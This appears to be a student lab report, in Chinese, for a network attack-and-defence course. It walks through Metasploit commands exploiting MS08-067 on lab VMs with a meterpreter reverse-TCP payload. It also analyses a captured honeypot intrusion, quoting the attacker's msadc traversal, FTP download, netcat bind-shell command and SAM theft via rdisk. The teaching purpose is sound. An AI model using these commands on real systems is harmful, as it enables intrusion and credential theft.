202212918 2021-2022-2《网络攻防实践》实践六报告
一、实践内容
- (1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
1)攻击者使用了什么破解工具进行攻击
2)攻击者如何使用这个破解工具进入并控制了系统
3)攻击者获得系统访问权限后做了什么
4)我们如何防止这样的攻击
5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
(3)团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
二、实践过程
2.1 动手实践Metasploit windows attacker
- 使用metasploit软件进行windows远程渗透统计实验
- 具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
| 虚拟机 | IP地址 |
|---|---|
| kali | 192.168.200.129 |
| win2kserver | 192.168.200.128 |
- (1)将win2kserver(IP地址为192.168.200.128)作为Windows靶机,kali(IP地址为192.168.200.129)作为攻击机。首先在kali终端提权后输入msfconsole
- (2)接着输入命令search ms08_067打开漏洞
- (3)输入命令use exploit/windows/smb/ms08_067
- (4)输入命令show payloads查看载荷
- (5)接下来输入命令 set PAYLOAD windows/meterpreter/reverse_tcp,设置有效攻击载荷
- (6)输入set PAYLOAD 3后,再输入show options 查看攻击数据,可以看见RHOSTS靶机和LHOST攻击机,如下图所标记的位置
- (7)分别设置靶机和攻击机的IP地址: set RHOSTS “192.168.200.128” 和 set LHOST “192.168.200.129”,之后输入命令show options 查看数据。如下图
- (8)set TARGET 0设置目标操作系统平台类型,输入exploit开始攻击
2.2 解码一次成功的NT系统破解攻击
来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
1)攻击者使用了什么破解工具进行攻击
2)攻击者如何使用这个破解工具进入并控制了系统
3)攻击者获得系统访问权限后做了什么
4)我们如何防止这样的攻击
5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
- 1)首先用wireshark打开那个.log文件,设置限定条件为:ip.addr==172.16.1.106 and http
boot.ini是NT系统的启动文件。而前面的..%c0af..是"/"的Unicode编码,然后我们可以看到攻击者试图向服务器获取一个msadcs.dll文件,执行shell脚本数据为shell ( “cmd /c echo werd >> c : f u n ” ),根据ADM!ROX!YOUR!WORLD特征字符串,表明是msadc - .pl工具发起的渗透攻击
- 2)攻击者如何使用这个破解工具进入并控制了系统?
在Wireshark中输入ip.src == 213.116.251.162 && ip.dst == 172.16.1.106 && http.request.method == "POST"进行过滤
- 在 179 号数据包追踪 TCP 流,可以看到如下指令,攻击者创建了一个 ftpcom 脚本
- 在 299 号数据包追踪 TCP 流,发现攻击者试图连接至 FTP 服务器 204.42.253.18,但未成功
- 在1106 号数据包,FTP 连接成功
- 继续查看到 1224 号数据包,看到攻击者执行了:cmd1.exe /c nc -l -p 6969 -e cmd1.exe,表示攻击者连接了 6969 端口,并且获得了访问权限。
- 3)攻击者获得系统访问权限后做了什么
- 筛选 tcp.port == 6969,并追踪 TCP 流
- 接着我们可以看到攻击者尝试进入但失败
- 接着列出了用户
- 然后发了一个 echo 消息到 C 盘根目录文件 README.NOW.Hax0r
- 然后删除了许多文件
- 使用 rdisk 尝试获得 SAM 口令文件(安全账号管理器),rdisk 是磁盘修复程序,执行 rdisk /s- 备份关键系统信息,在 /repair 目录中就会创建一个名为 sam._ 的 SAM 压缩拷贝,并且攻击者把这个文件拷贝到 har.txt 并打印
- 最后离开
- 4)我们如何防止这样的攻击
升级系统到最新的稳定版本并且要及时更新微软官方的漏洞补丁。 - 5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
- 在 4351 号数据包,攻击者留下记录
因此攻击者应该是警觉了目标为一台蜜罐主机。
2.3 Windows系统远程渗透攻击与分析
- 攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
| 虚拟机 | IP地址 |
|---|---|
| kali | 192.168.200.129 |
| win2kserver | 192.168.200.128 |
- 1)重复2.1实验的步骤,Kali虚拟机作为攻击方攻击组员的靶机Win2kServer,,对靶机上的MS08-067漏洞进行远程渗透攻击,已获取win2kserver的访问权,并在其winnt\system32目录下创建文件xxf
- 对方主机winnt\system32目录确有文件xxf,表明渗透攻击成功。
- 2)防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
- Kali虚拟机作为攻击方攻击我的靶机Win2kServer时,对其MS08-067漏洞进行远程渗透攻击,具体攻击过程仍与前面一致,如图我打开Win2kServer的Wireshark,可以监听到对方对我的攻击过程,并从下图中我们发现攻击机向靶机发了许多SMB、TCP协议包
- 并且在我的靶机Win2kServer上发现对方在我的winnt\system32目录下创建了文件20212918xxf
3 遇到的问题及解决方法
- 刚开始做实验,win2k明明有网却ping不通百度以及kali,kaliping不通win2k
解决方法:原因是上次实验,win2k中的IP安全设置中的设置还在继续运行,将其关闭后,成功ping通。
4 心得体会
在操作上还是有些生疏,对于虚拟机中的一些功能还是不太熟练,有些知识点并不是很懂,在做完试验过后,对于知识点的熟悉程度上升了一点,希望后面能够提高。
